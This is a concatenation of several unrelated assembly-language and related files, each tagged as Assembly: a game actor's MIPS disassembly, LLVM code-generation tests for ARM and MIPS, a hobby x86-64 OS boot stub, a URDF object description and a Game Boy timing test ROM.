/* 01988 80A75C98 4600503C */ c.lt.s $f10, $f0
/* 0198C 80A75C9C 00000000 */ nop
/* 01990 80A75CA0 45020003 */ bc1fl .L80A75CB0
/* 01994 80A75CA4 921803FD */ lbu $t8, 0x03FD($s0) ## 000003FD
/* 01998 80A75CA8 E6000164 */ swc1 $f0, 0x0164($s0) ## 00000164
/* 0199C 80A75CAC 921803FD */ lbu $t8, 0x03FD($s0) ## 000003FD
.L80A75CB0:
/* 019A0 80A75CB0 92080331 */ lbu $t0, 0x0331($s0) ## 00000331
/* 019A4 80A75CB4 3319FF7F */ andi $t9, $t8, 0xFF7F ## $t9 = 00000000
/* 019A8 80A75CB8 3109FFFD */ andi $t1, $t0, 0xFFFD ## $t1 = 00000000
/* 019AC 80A75CBC A21903FD */ sb $t9, 0x03FD($s0) ## 000003FD
/* 019B0 80A75CC0 100000B2 */ beq $zero, $zero, .L80A75F8C
/* 019B4 80A75CC4 A2090331 */ sb $t1, 0x0331($s0) ## 00000331
/* 019B8 80A75CC8 920A0331 */ lbu $t2, 0x0331($s0) ## 00000331
.L80A75CCC:
# Bit 2 of +0x331 set: run the hit-reaction path.
/* 019BC 80A75CCC 26020024 */ addiu $v0, $s0, 0x0024 ## $v0 = 00000024
/* 019C0 80A75CD0 314B0002 */ andi $t3, $t2, 0x0002 ## $t3 = 00000000
/* 019C4 80A75CD4 516000AE */ beql $t3, $zero, .L80A75F90
/* 019C8 80A75CD8 8FBF0024 */ lw $ra, 0x0024($sp)
/* 019CC 80A75CDC 8C4E0000 */ lw $t6, 0x0000($v0) ## 00000024
/* 019D0 80A75CE0 27AC0038 */ addiu $t4, $sp, 0x0038 ## $t4 = FFFFFFE8
/* 019D4 80A75CE4 3C014248 */ lui $at, 0x4248 ## $at = 42480000
/* 019D8 80A75CE8 AD8E0000 */ sw $t6, 0x0000($t4) ## FFFFFFE8
/* 019DC 80A75CEC 8C4D0004 */ lw $t5, 0x0004($v0) ## 00000028
/* 019E0 80A75CF0 44819000 */ mtc1 $at, $f18 ## $f18 = 50.00
/* 019E4 80A75CF4 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 019E8 80A75CF8 AD8D0004 */ sw $t5, 0x0004($t4) ## FFFFFFEC
/* 019EC 80A75CFC 8C4E0008 */ lw $t6, 0x0008($v0) ## 0000002C
/* 019F0 80A75D00 26050338 */ addiu $a1, $s0, 0x0338 ## $a1 = 00000338
/* 019F4 80A75D04 24060001 */ addiu $a2, $zero, 0x0001 ## $a2 = 00000001
/* 019F8 80A75D08 AD8E0008 */ sw $t6, 0x0008($t4) ## FFFFFFF0
/* 019FC 80A75D0C C7B0003C */ lwc1 $f16, 0x003C($sp)
/* 01A00 80A75D10 AFA20030 */ sw $v0, 0x0030($sp)
/* 01A04 80A75D14 46128100 */ add.s $f4, $f16, $f18
/* 01A08 80A75D18 0C00D594 */ jal func_80035650
/* 01A0C 80A75D1C E7A4003C */ swc1 $f4, 0x003C($sp)
/* 01A10 80A75D20 920F00B1 */ lbu $t7, 0x00B1($s0) ## 000000B1
/* 01A14 80A75D24 92180331 */ lbu $t8, 0x0331($s0) ## 00000331
/* 01A18 80A75D28 2401000D */ addiu $at, $zero, 0x000D ## $at = 0000000D
/* 01A1C 80A75D2C 31E200FF */ andi $v0, $t7, 0x00FF ## $v0 = 00000000
/* 01A20 80A75D30 3319FFFD */ andi $t9, $t8, 0xFFFD ## $t9 = 00000000
/* 01A24 80A75D34 A2190331 */ sb $t9, 0x0331($s0) ## 00000331
/* 01A28 80A75D38 1040000A */ beq $v0, $zero, .L80A75D64
/* 01A2C 80A75D3C A20F02FD */ sb $t7, 0x02FD($s0) ## 000002FD
/* 01A30 80A75D40 10410008 */ beq $v0, $at, .L80A75D64
/* 01A34 80A75D44 00000000 */ nop
/* 01A38 80A75D48 920802FB */ lbu $t0, 0x02FB($s0) ## 000002FB
/* 01A3C 80A75D4C 2401000E */ addiu $at, $zero, 0x000E ## $at = 0000000E
/* 01A40 80A75D50 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01A44 80A75D54 15000009 */ bne $t0, $zero, .L80A75D7C
/* 01A48 80A75D58 24054000 */ addiu $a1, $zero, 0x4000 ## $a1 = 00004000
/* 01A4C 80A75D5C 54410008 */ bnel $v0, $at, .L80A75D80
/* 01A50 80A75D60 2409000C */ addiu $t1, $zero, 0x000C ## $t1 = 0000000C
.L80A75D64:
/* 01A54 80A75D64 10400089 */ beq $v0, $zero, .L80A75F8C
/* 01A58 80A75D68 8FA40054 */ lw $a0, 0x0054($sp)
/* 01A5C 80A75D6C 0C018B58 */ jal func_80062D60
/* 01A60 80A75D70 27A50038 */ addiu $a1, $sp, 0x0038 ## $a1 = FFFFFFE8
/* 01A64 80A75D74 10000086 */ beq $zero, $zero, .L80A75F90
/* 01A68 80A75D78 8FBF0024 */ lw $ra, 0x0024($sp)
.L80A75D7C:
/* 01A6C 80A75D7C 2409000C */ addiu $t1, $zero, 0x000C ## $t1 = 0000000C
.L80A75D80:
/* 01A70 80A75D80 AFA90010 */ sw $t1, 0x0010($sp)
/* 01A74 80A75D84 240600FF */ addiu $a2, $zero, 0x00FF ## $a2 = 000000FF
/* 01A78 80A75D88 0C00D09B */ jal func_8003426C
/* 01A7C 80A75D8C 00003825 */ or $a3, $zero, $zero ## $a3 = 00000000
# Apply damage; v1/0x49($sp) preserves health before the hit.
/* 01A80 80A75D90 920300AF */ lbu $v1, 0x00AF($s0) ## 000000AF
/* 01A84 80A75D94 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01A88 80A75D98 0C00D58A */ jal Actor_ApplyDamage
/* 01A8C 80A75D9C A3A30049 */ sb $v1, 0x0049($sp)
/* 01A90 80A75DA0 860A001C */ lh $t2, 0x001C($s0) ## 0000001C
/* 01A94 80A75DA4 93A30049 */ lbu $v1, 0x0049($sp)
/* 01A98 80A75DA8 1140000E */ beq $t2, $zero, .L80A75DE4
/* 01A9C 80A75DAC 2861000B */ slti $at, $v1, 0x000B
/* 01AA0 80A75DB0 1420000A */ bne $at, $zero, .L80A75DDC
/* 01AA4 80A75DB4 AFA30030 */ sw $v1, 0x0030($sp)
/* 01AA8 80A75DB8 920C00AF */ lbu $t4, 0x00AF($s0) ## 000000AF
/* 01AAC 80A75DBC 240D0001 */ addiu $t5, $zero, 0x0001 ## $t5 = 00000001
/* 01AB0 80A75DC0 26040308 */ addiu $a0, $s0, 0x0308 ## $a0 = 00000308
/* 01AB4 80A75DC4 2981000B */ slti $at, $t4, 0x000B
/* 01AB8 80A75DC8 10200004 */ beq $at, $zero, .L80A75DDC
/* 01ABC 80A75DCC 24050003 */ addiu $a1, $zero, 0x0003 ## $a1 = 00000003
/* 01AC0 80A75DD0 A20D02FB */ sb $t5, 0x02FB($s0) ## 000002FB
/* 01AC4 80A75DD4 0C00CB89 */ jal func_80032E24
/* 01AC8 80A75DD8 8FA60054 */ lw $a2, 0x0054($sp)
.L80A75DDC:
/* 01ACC 80A75DDC 1000001F */ beq $zero, $zero, .L80A75E5C
/* 01AD0 80A75DE0 920200AF */ lbu $v0, 0x00AF($s0) ## 000000AF
.L80A75DE4:
# Health at +0xAF dropped below 0x0B: convert the actor's category and
# play the corresponding cue; also set the switch flag if one is bound.
/* 01AD4 80A75DE4 920200AF */ lbu $v0, 0x00AF($s0) ## 000000AF
/* 01AD8 80A75DE8 8FA40054 */ lw $a0, 0x0054($sp)
/* 01ADC 80A75DEC 02003025 */ or $a2, $s0, $zero ## $a2 = 00000000
/* 01AE0 80A75DF0 2841000B */ slti $at, $v0, 0x000B
/* 01AE4 80A75DF4 10200010 */ beq $at, $zero, .L80A75E38
/* 01AE8 80A75DF8 24851C24 */ addiu $a1, $a0, 0x1C24 ## $a1 = 00001C24
/* 01AEC 80A75DFC 0C00CDD2 */ jal Actor_ChangeType
/* 01AF0 80A75E00 24070009 */ addiu $a3, $zero, 0x0009 ## $a3 = 00000009
/* 01AF4 80A75E04 8FA40054 */ lw $a0, 0x0054($sp)
/* 01AF8 80A75E08 8FA50030 */ lw $a1, 0x0030($sp)
/* 01AFC 80A75E0C 24060014 */ addiu $a2, $zero, 0x0014 ## $a2 = 00000014
/* 01B00 80A75E10 0C01AEB6 */ jal Audio_PlaySoundAtPosition
/* 01B04 80A75E14 2407388B */ addiu $a3, $zero, 0x388B ## $a3 = 0000388B
/* 01B08 80A75E18 86050302 */ lh $a1, 0x0302($s0) ## 00000302
/* 01B0C 80A75E1C 240100FF */ addiu $at, $zero, 0x00FF ## $at = 000000FF
/* 01B10 80A75E20 50A1005B */ beql $a1, $at, .L80A75F90
/* 01B14 80A75E24 8FBF0024 */ lw $ra, 0x0024($sp)
/* 01B18 80A75E28 0C00B2DD */ jal Flags_SetSwitch
/* 01B1C 80A75E2C 8FA40054 */ lw $a0, 0x0054($sp)
/* 01B20 80A75E30 10000057 */ beq $zero, $zero, .L80A75F90
/* 01B24 80A75E34 8FBF0024 */ lw $ra, 0x0024($sp)
.L80A75E38:
/* 01B28 80A75E38 24010032 */ addiu $at, $zero, 0x0032 ## $at = 00000032
/* 01B2C 80A75E3C 14610007 */ bne $v1, $at, .L80A75E5C
/* 01B30 80A75E40 AFA30030 */ sw $v1, 0x0030($sp)
/* 01B34 80A75E44 8FA40054 */ lw $a0, 0x0054($sp)
/* 01B38 80A75E48 02003025 */ or $a2, $s0, $zero ## $a2 = 00000000
/* 01B3C 80A75E4C 24070005 */ addiu $a3, $zero, 0x0005 ## $a3 = 00000005
/* 01B40 80A75E50 0C00CDD2 */ jal Actor_ChangeType
/* 01B44 80A75E54 24851C24 */ addiu $a1, $a0, 0x1C24 ## $a1 = 00001C24
/* 01B48 80A75E58 920200AF */ lbu $v0, 0x00AF($s0) ## 000000AF
.L80A75E5C:
/* 01B4C 80A75E5C 14400008 */ bne $v0, $zero, .L80A75E80
/* 01B50 80A75E60 26040032 */ addiu $a0, $s0, 0x0032 ## $a0 = 00000032
/* 01B54 80A75E64 0C29D663 */ jal func_80A7598C
/* 01B58 80A75E68 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01B5C 80A75E6C 8FA40054 */ lw $a0, 0x0054($sp)
/* 01B60 80A75E70 0C00CB1F */ jal func_80032C7C
/* 01B64 80A75E74 02002825 */ or $a1, $s0, $zero ## $a1 = 00000000
/* 01B68 80A75E78 10000045 */ beq $zero, $zero, .L80A75F90
/* 01B6C 80A75E7C 8FBF0024 */ lw $ra, 0x0024($sp)
.L80A75E80:
# Still alive: steer toward target yaw, maybe retaliate, play hurt cues.
/* 01B70 80A75E80 8605008A */ lh $a1, 0x008A($s0) ## 0000008A
/* 01B74 80A75E84 AFA00010 */ sw $zero, 0x0010($sp)
/* 01B78 80A75E88 24060001 */ addiu $a2, $zero, 0x0001 ## $a2 = 00000001
/* 01B7C 80A75E8C 0C01E1A7 */ jal Math_SmoothScaleMaxMinS
/* 01B80 80A75E90 240707D0 */ addiu $a3, $zero, 0x07D0 ## $a3 = 000007D0
/* 01B84 80A75E94 8618001C */ lh $t8, 0x001C($s0) ## 0000001C
/* 01B88 80A75E98 57000019 */ bnel $t8, $zero, .L80A75F00
/* 01B8C 80A75E9C 8609001C */ lh $t1, 0x001C($s0) ## 0000001C
/* 01B90 80A75EA0 0C03F66B */ jal Math_Rand_ZeroOne
## Rand.Next() float
/* 01B94 80A75EA4 00000000 */ nop
/* 01B98 80A75EA8 3C013F00 */ lui $at, 0x3F00 ## $at = 3F000000
/* 01B9C 80A75EAC 44813000 */ mtc1 $at, $f6 ## $f6 = 0.50
/* 01BA0 80A75EB0 00000000 */ nop
/* 01BA4 80A75EB4 4606003C */ c.lt.s $f0, $f6
/* 01BA8 80A75EB8 00000000 */ nop
/* 01BAC 80A75EBC 45020010 */ bc1fl .L80A75F00
/* 01BB0 80A75EC0 8609001C */ lh $t1, 0x001C($s0) ## 0000001C
/* 01BB4 80A75EC4 8619008A */ lh $t9, 0x008A($s0) ## 0000008A
/* 01BB8 80A75EC8 860800B6 */ lh $t0, 0x00B6($s0) ## 000000B6
/* 01BBC 80A75ECC 03281023 */ subu $v0, $t9, $t0
/* 01BC0 80A75ED0 00021400 */ sll $v0, $v0, 16
/* 01BC4 80A75ED4 00021403 */ sra $v0, $v0, 16
/* 01BC8 80A75ED8 04400003 */ bltz $v0, .L80A75EE8
/* 01BCC 80A75EDC 00021823 */ subu $v1, $zero, $v0
/* 01BD0 80A75EE0 10000001 */ beq $zero, $zero, .L80A75EE8
/* 01BD4 80A75EE4 00401825 */ or $v1, $v0, $zero ## $v1 = 00000000
.L80A75EE8:
# v1 = abs(yaw delta); only react when facing away by more than 0x4000.
/* 01BD8 80A75EE8 28614001 */ slti $at, $v1, 0x4001
/* 01BDC 80A75EEC 54200004 */ bnel $at, $zero, .L80A75F00
/* 01BE0 80A75EF0 8609001C */ lh $t1, 0x001C($s0) ## 0000001C
/* 01BE4 80A75EF4 0C29D528 */ jal func_80A754A0
/* 01BE8 80A75EF8 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01BEC 80A75EFC 8609001C */ lh $t1, 0x001C($s0) ## 0000001C
.L80A75F00:
/* 01BF0 80A75F00 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01BF4 80A75F04 11200019 */ beq $t1, $zero, .L80A75F6C
/* 01BF8 80A75F08 00000000 */ nop
/* 01BFC 80A75F0C 920A02FB */ lbu $t2, 0x02FB($s0) ## 000002FB
/* 01C00 80A75F10 8FAB0030 */ lw $t3, 0x0030($sp)
/* 01C04 80A75F14 11400015 */ beq $t2, $zero, .L80A75F6C
/* 01C08 80A75F18 2961000B */ slti $at, $t3, 0x000B
/* 01C0C 80A75F1C 1420000A */ bne $at, $zero, .L80A75F48
/* 01C10 80A75F20 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01C14 80A75F24 920C00AF */ lbu $t4, 0x00AF($s0) ## 000000AF
/* 01C18 80A75F28 2405392C */ addiu $a1, $zero, 0x392C ## $a1 = 0000392C
/* 01C1C 80A75F2C 2981000B */ slti $at, $t4, 0x000B
/* 01C20 80A75F30 10200005 */ beq $at, $zero, .L80A75F48
/* 01C24 80A75F34 00000000 */ nop
/* 01C28 80A75F38 0C00BE0A */ jal Audio_PlayActorSound2
/* 01C2C 80A75F3C 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01C30 80A75F40 10000006 */ beq $zero, $zero, .L80A75F5C
/* 01C34 80A75F44 00000000 */ nop
.L80A75F48:
/* 01C38 80A75F48 0C00BE0A */ jal Audio_PlayActorSound2
/* 01C3C 80A75F4C 240539BE */ addiu $a1, $zero, 0x39BE ## $a1 = 000039BE
/* 01C40 80A75F50 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01C44 80A75F54 0C00BE0A */ jal Audio_PlayActorSound2
/* 01C48 80A75F58 2405393B */ addiu $a1, $zero, 0x393B ## $a1 = 0000393B
.L80A75F5C:
/* 01C4C 80A75F5C 0C29D5E4 */ jal func_80A75790
/* 01C50 80A75F60 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01C54 80A75F64 1000000A */ beq $zero, $zero, .L80A75F90
/* 01C58 80A75F68 8FBF0024 */ lw $ra, 0x0024($sp)
.L80A75F6C:
/* 01C5C 80A75F6C 0C00BE0A */ jal Audio_PlayActorSound2
/* 01C60 80A75F70 2405393A */ addiu $a1, $zero, 0x393A ## $a1 = 0000393A
/* 01C64 80A75F74 02002025 */ or $a0, $s0, $zero ## $a0 = 00000000
/* 01C68 80A75F78 0C00BE0A */ jal Audio_PlayActorSound2
/* 01C6C 80A75F7C 240539BE */ addiu $a1, $zero, 0x39BE ## $a1 = 000039BE
/* 01C70 80A75F80 8FA40054 */ lw $a0, 0x0054($sp)
/* 01C74 80A75F84 0C018B35 */ jal func_80062CD4
/* 01C78 80A75F88 27A50038 */ addiu $a1, $sp, 0x0038 ## $a1 = FFFFFFE8
.L80A75F8C:
/* 01C7C 80A75F8C 8FBF0024 */ lw $ra, 0x0024($sp)
.L80A75F90:
/* 01C80 80A75F90 8FB00020 */ lw $s0, 0x0020($sp)
/* 01C84 80A75F94 27BD0050 */ addiu $sp, $sp, 0x0050 ## $sp = 00000000
/* 01C88 80A75F98 03E00008 */ jr $ra
/* 01C8C 80A75F9C 00000000 */ nop
| {
"language": "Assembly"
} |
; RUN: llc < %s -O0 -fast-isel-abort -mtriple=armv7-apple-darwin | FileCheck %s --check-prefix=DARWIN-ARM
; RUN: llc < %s -O0 -fast-isel-abort -mtriple=armv7-linux-gnueabi | FileCheck %s --check-prefix=LINUX-ARM
; RUN: llc < %s -O0 -fast-isel-abort -mtriple=thumbv7-apple-darwin | FileCheck %s --check-prefix=DARWIN-THUMB2
; RUN: llc < %s -O0 -fast-isel-abort -mtriple=thumbv7-linux-gnueabi | FileCheck %s --check-prefix=LINUX-THUMB2
; llvm.frameaddress(0) under fast-isel: the current frame address is just
; the frame-pointer register itself (r7 on Darwin/Thumb2, r11 on Linux
; ARM), as pinned by the per-triple check lines below.  (The prefixed
; comment lines are FileCheck directives and must not be edited.)
define i8* @frameaddr_index0() nounwind {
entry:
; DARWIN-ARM: frameaddr_index0:
; DARWIN-ARM: push {r7}
; DARWIN-ARM: mov r7, sp
; DARWIN-ARM: mov r0, r7
; DARWIN-THUMB2: frameaddr_index0:
; DARWIN-THUMB2: str r7, [sp, #-4]!
; DARWIN-THUMB2: mov r7, sp
; DARWIN-THUMB2: mov r0, r7
; LINUX-ARM: frameaddr_index0:
; LINUX-ARM: push {r11}
; LINUX-ARM: mov r11, sp
; LINUX-ARM: mov r0, r11
; LINUX-THUMB2: frameaddr_index0:
; LINUX-THUMB2: str r7, [sp, #-4]!
; LINUX-THUMB2: mov r7, sp
; LINUX-THUMB2: mov r0, r7
%0 = call i8* @llvm.frameaddress(i32 0)
ret i8* %0
}
; llvm.frameaddress(1): one level up the call chain, lowered as the frame
; pointer followed by a single chained load of the saved caller FP.
define i8* @frameaddr_index1() nounwind {
entry:
; DARWIN-ARM: frameaddr_index1:
; DARWIN-ARM: push {r7}
; DARWIN-ARM: mov r7, sp
; DARWIN-ARM: mov r0, r7
; DARWIN-ARM: ldr r0, [r0]
; DARWIN-THUMB2: frameaddr_index1:
; DARWIN-THUMB2: str r7, [sp, #-4]!
; DARWIN-THUMB2: mov r7, sp
; DARWIN-THUMB2: mov r0, r7
; DARWIN-THUMB2: ldr r0, [r0]
; LINUX-ARM: frameaddr_index1:
; LINUX-ARM: push {r11}
; LINUX-ARM: mov r11, sp
; LINUX-ARM: mov r0, r11
; LINUX-ARM: ldr r0, [r0]
; LINUX-THUMB2: frameaddr_index1:
; LINUX-THUMB2: str r7, [sp, #-4]!
; LINUX-THUMB2: mov r7, sp
; LINUX-THUMB2: mov r0, r7
; LINUX-THUMB2: ldr r0, [r0]
%0 = call i8* @llvm.frameaddress(i32 1)
ret i8* %0
}
; llvm.frameaddress(3): three chained loads walking the saved-FP linked
; list — one ldr per level of depth.
define i8* @frameaddr_index3() nounwind {
entry:
; DARWIN-ARM: frameaddr_index3:
; DARWIN-ARM: push {r7}
; DARWIN-ARM: mov r7, sp
; DARWIN-ARM: mov r0, r7
; DARWIN-ARM: ldr r0, [r0]
; DARWIN-ARM: ldr r0, [r0]
; DARWIN-ARM: ldr r0, [r0]
; DARWIN-THUMB2: frameaddr_index3:
; DARWIN-THUMB2: str r7, [sp, #-4]!
; DARWIN-THUMB2: mov r7, sp
; DARWIN-THUMB2: mov r0, r7
; DARWIN-THUMB2: ldr r0, [r0]
; DARWIN-THUMB2: ldr r0, [r0]
; DARWIN-THUMB2: ldr r0, [r0]
; LINUX-ARM: frameaddr_index3:
; LINUX-ARM: push {r11}
; LINUX-ARM: mov r11, sp
; LINUX-ARM: mov r0, r11
; LINUX-ARM: ldr r0, [r0]
; LINUX-ARM: ldr r0, [r0]
; LINUX-ARM: ldr r0, [r0]
; LINUX-THUMB2: frameaddr_index3:
; LINUX-THUMB2: str r7, [sp, #-4]!
; LINUX-THUMB2: mov r7, sp
; LINUX-THUMB2: mov r0, r7
; LINUX-THUMB2: ldr r0, [r0]
; LINUX-THUMB2: ldr r0, [r0]
; LINUX-THUMB2: ldr r0, [r0]
%0 = call i8* @llvm.frameaddress(i32 3)
ret i8* %0
}
; Intrinsic declaration shared by the three tests above.
declare i8* @llvm.frameaddress(i32) nounwind readnone
| {
"language": "Assembly"
} |
; RUN: llc -march=mips64 -relocation-model=static -soft-float -mattr=-n64,+n32 < %s | FileCheck --check-prefix=ALL --check-prefix=SYM32 %s
; RUN: llc -march=mips64el -relocation-model=static -soft-float -mattr=-n64,+n32 < %s | FileCheck --check-prefix=ALL --check-prefix=SYM32 %s
; RUN: llc -march=mips64 -relocation-model=static -soft-float -mattr=-n64,+n64 < %s | FileCheck --check-prefix=ALL --check-prefix=SYM64 %s
; RUN: llc -march=mips64el -relocation-model=static -soft-float -mattr=-n64,+n64 < %s | FileCheck --check-prefix=ALL --check-prefix=SYM64 %s
; Test the fp128 arguments for all ABI's and byte orders as specified
; by section 2 of the MIPSpro N32 Handbook.
;
; O32 is not tested because long double is the same as double on O32.
@ldoubles = global [11 x fp128] zeroinitializer
define void @ldouble_args(fp128 %a, fp128 %b, fp128 %c, fp128 %d, fp128 %e) nounwind {
entry:
%0 = getelementptr [11 x fp128]* @ldoubles, i32 0, i32 1
store volatile fp128 %a, fp128* %0
%1 = getelementptr [11 x fp128]* @ldoubles, i32 0, i32 2
store volatile fp128 %b, fp128* %1
%2 = getelementptr [11 x fp128]* @ldoubles, i32 0, i32 3
store volatile fp128 %c, fp128* %2
%3 = getelementptr [11 x fp128]* @ldoubles, i32 0, i32 4
store volatile fp128 %d, fp128* %3
%4 = getelementptr [11 x fp128]* @ldoubles, i32 0, i32 5
store volatile fp128 %e, fp128* %4
ret void
}
; ALL-LABEL: ldouble_args:
; We won't test the way the global address is calculated in this test. This is
; just to get the register number for the other checks.
; SYM32-DAG: addiu [[R2:\$[0-9]+]], ${{[0-9]+}}, %lo(ldoubles)
; SYM64-DAG: ld [[R2:\$[0-9]]], %got_disp(ldoubles)(
; The first four arguments are the same in N32/N64.
; The first argument is floating point but soft-float is enabled so floating
; point registers are not used.
; ALL-DAG: sd $4, 16([[R2]])
; ALL-DAG: sd $5, 24([[R2]])
; ALL-DAG: sd $6, 32([[R2]])
; ALL-DAG: sd $7, 40([[R2]])
; ALL-DAG: sd $8, 48([[R2]])
; ALL-DAG: sd $9, 56([[R2]])
; ALL-DAG: sd $10, 64([[R2]])
; ALL-DAG: sd $11, 72([[R2]])
; N32/N64 have run out of registers and start using the stack too
; ALL-DAG: ld [[R3:\$[0-9]+]], 0($sp)
; ALL-DAG: ld [[R4:\$[0-9]+]], 8($sp)
; ALL-DAG: sd [[R3]], 80([[R2]])
; ALL-DAG: sd [[R4]], 88([[R2]])
| {
"language": "Assembly"
} |
/***************************************************
* 版权声明
*
* 本操作系统名为:MINE
* 该操作系统未经授权不得以盈利或非盈利为目的进行开发,
* 只允许个人学习以及公开交流使用
*
* 代码最终所有权及解释权归田宇所有;
*
* 本模块作者: 田宇
* EMail: [email protected]
*
*
***************************************************/
.section .text
.globl _start
_start:
mov $0x10, %ax
mov %ax, %ds
mov %ax, %es
mov %ax, %fs
mov %ax, %ss
mov $0x7E00, %esp
//======= load GDTR
lgdt GDT_POINTER(%rip)
//======= load IDTR
lidt IDT_POINTER(%rip)
mov $0x10, %ax
mov %ax, %ds
mov %ax, %es
mov %ax, %fs
mov %ax, %gs
mov %ax, %ss
movq $0x7E00, %rsp
//======= load cr3
movq $0x101000, %rax
movq %rax, %cr3
movq switch_seg(%rip), %rax
pushq $0x08
pushq %rax
lretq
//======= 64-bit mode code
switch_seg:
.quad entry64
entry64:
movq $0x10, %rax
movq %rax, %ds
movq %rax, %es
movq %rax, %gs
movq %rax, %ss
movq $0xffff800000007E00, %rsp /* rsp address */
setup_IDT:
leaq ignore_int(%rip), %rdx
movq $(0x08 << 16), %rax
movw %dx, %ax
movq $(0x8E00 << 32), %rcx
addq %rcx, %rax
movl %edx, %ecx
shrl $16, %ecx
shlq $48, %rcx
addq %rcx, %rax
shrq $32, %rdx
leaq IDT_Table(%rip), %rdi
mov $256, %rcx
rp_sidt:
movq %rax, (%rdi)
movq %rdx, 8(%rdi)
addq $0x10, %rdi
dec %rcx
jne rp_sidt
setup_TSS64:
leaq TSS64_Table(%rip), %rdx
xorq %rax, %rax
xorq %rcx, %rcx
movq $0x89, %rax
shlq $40, %rax
movl %edx, %ecx
shrl $24, %ecx
shlq $56, %rcx
addq %rcx, %rax
xorq %rcx, %rcx
movl %edx, %ecx
andl $0xffffff, %ecx
shlq $16, %rcx
addq %rcx, %rax
addq $103, %rax
leaq GDT_Table(%rip), %rdi
movq %rax, 64(%rdi)
shrq $32, %rdx
movq %rdx, 72(%rdi)
mov $0x40, %ax
ltr %ax
movq go_to_kernel(%rip), %rax /* movq address */
pushq $0x08
pushq %rax
lretq
go_to_kernel:
.quad Start_Kernel
//======= ignore_int
; Default interrupt/exception handler: saves all state, prints an error
; message, then hangs forever in Loop.  The restore sequence after Loop is
; dead code (kept as the reference shape of a full iretq return path).
ignore_int:
cld
pushq %rax
pushq %rbx
pushq %rcx
pushq %rdx
pushq %rbp
pushq %rdi
pushq %rsi
pushq %r8
pushq %r9
pushq %r10
pushq %r11
pushq %r12
pushq %r13
pushq %r14
pushq %r15
movq %es, %rax ; save segment selectors too
pushq %rax
movq %ds, %rax
pushq %rax
movq $0x10, %rax ; switch DS/ES to the kernel data segment
movq %rax, %ds
movq %rax, %es
leaq int_msg(%rip), %rax /* leaq gets RIP-relative address of int_msg */
pushq %rax ; NOTE(review): pushed then discarded below — presumably
           ; stack alignment / scratch for color_printk; confirm
movq %rax, %rdx ; 3rd arg: format string
movq $0x00000000, %rsi ; 2nd arg: background color (black)
movq $0x00ff0000, %rdi ; 1st arg: foreground color (red)
movq $0, %rax ; AL = 0: no vector registers used (variadic call ABI)
callq color_printk
addq $0x8, %rsp ; drop the pushed int_msg pointer
Loop:
jmp Loop ; hang: unknown interrupts are fatal
; ---- unreachable restore path ----
popq %rax
movq %rax, %ds
popq %rax
movq %rax, %es
popq %r15
popq %r14
popq %r13
popq %r12
popq %r11
popq %r10
popq %r9
popq %r8
popq %rsi
popq %rdi
popq %rbp
popq %rdx
popq %rcx
popq %rbx
popq %rax
iretq
int_msg:
.asciz "Unknown interrupt or fault at RIP\n"
//======= init page
.align 8
.org 0x1000
__PML4E:
.quad 0x102007
.fill 255,8,0
.quad 0x102007
.fill 255,8,0
.org 0x2000
__PDPTE:
.quad 0x103003
.fill 511,8,0
.org 0x3000
__PDE:
.quad 0x000083
.quad 0x200083
.quad 0x400083
.quad 0x600083
.quad 0x800083
.quad 0xe0000083 /*0x a00000*/
.quad 0xe0200083
.quad 0xe0400083
.quad 0xe0600083
.quad 0xe0800083 /*0x1000000*/
.quad 0xe0a00083
.quad 0xe0c00083
.quad 0xe0e00083
.fill 499,8,0
//======= GDT_Table
.section .data
.globl GDT_Table
GDT_Table:
.quad 0x0000000000000000 /*0 NULL descriptor 00*/
.quad 0x0020980000000000 /*1 KERNEL Code 64-bit Segment 08*/
.quad 0x0000920000000000 /*2 KERNEL Data 64-bit Segment 10*/
.quad 0x0020f80000000000 /*3 USER Code 64-bit Segment 18*/
.quad 0x0000f20000000000 /*4 USER Data 64-bit Segment 20*/
.quad 0x00cf9a000000ffff /*5 KERNEL Code 32-bit Segment 28*/
.quad 0x00cf92000000ffff /*6 KERNEL Data 32-bit Segment 30*/
.fill 10,8,0 /*8 ~ 9 TSS (jmp one segment <7>) in long-mode 128-bit 40*/
GDT_END:
GDT_POINTER:
GDT_LIMIT: .word GDT_END - GDT_Table - 1
GDT_BASE: .quad GDT_Table
//======= IDT_Table
.globl IDT_Table
IDT_Table:
.fill 512,8,0
IDT_END:
IDT_POINTER:
IDT_LIMIT: .word IDT_END - IDT_Table - 1
IDT_BASE: .quad IDT_Table
//======= TSS64_Table
.globl TSS64_Table
TSS64_Table:
.fill 13,8,0
TSS64_END:
TSS64_POINTER:
TSS64_LIMIT: .word TSS64_END - TSS64_Table - 1
TSS64_BASE: .quad TSS64_Table
| {
"language": "Assembly"
} |
<robot name="blob838">
<link name="random_obj_838">
<contact>
<lateral_friction value="1.0"/>
<rolling_friction value="0.0"/>
<inertia_scaling value="3.0"/>
<contact_cfm value="0.0"/>
<contact_erp value="1.0"/>
</contact>
<inertial>
<origin rpy="0 0 0" xyz="0 0 0"/>
<mass value="0.1"/>
<inertia ixx="1" ixy="0" ixz="0" iyy="1" iyz="0" izz="0"/>
</inertial>
<visual>
<origin rpy="0 0 0" xyz="0 0 0"/>
<geometry>
<mesh filename="838.obj" scale="0.015 0.015 0.015"/>
</geometry>
<material name="blockmat">
<color rgba="0.97 0.82 0.57 1"/>
</material>
</visual>
<collision>
<origin rpy="0 0 0" xyz="0 0 0"/>
<geometry>
<mesh filename="838.obj" scale="0.015 0.015 0.015"/>
</geometry>
</collision>
</link>
</robot>
| {
"language": "Assembly"
} |
.size 8000
.text@48
jp lstatint
.text@100
jp lbegin
.data@143
80
.text@150
lbegin:
ld a, 03
ldff(43), a
ld c, 41
ld b, 03
lbegin_waitm3:
ldff a, (c)
and a, b
cmp a, b
jrnz lbegin_waitm3
ld a, 20
ldff(c), a
xor a, a
ldff(0f), a
ld a, 02
ldff(ff), a
ei
.text@1000
lstatint:
ld a, 08
ldff(c), a
.text@1036
halt
.text@1067
ldff a, (c)
and a, 07
jp lprint_a
.text@7000
lprint_a:
push af
ld b, 91
call lwaitly_b
xor a, a
ldff(40), a
pop af
ld(9800), a
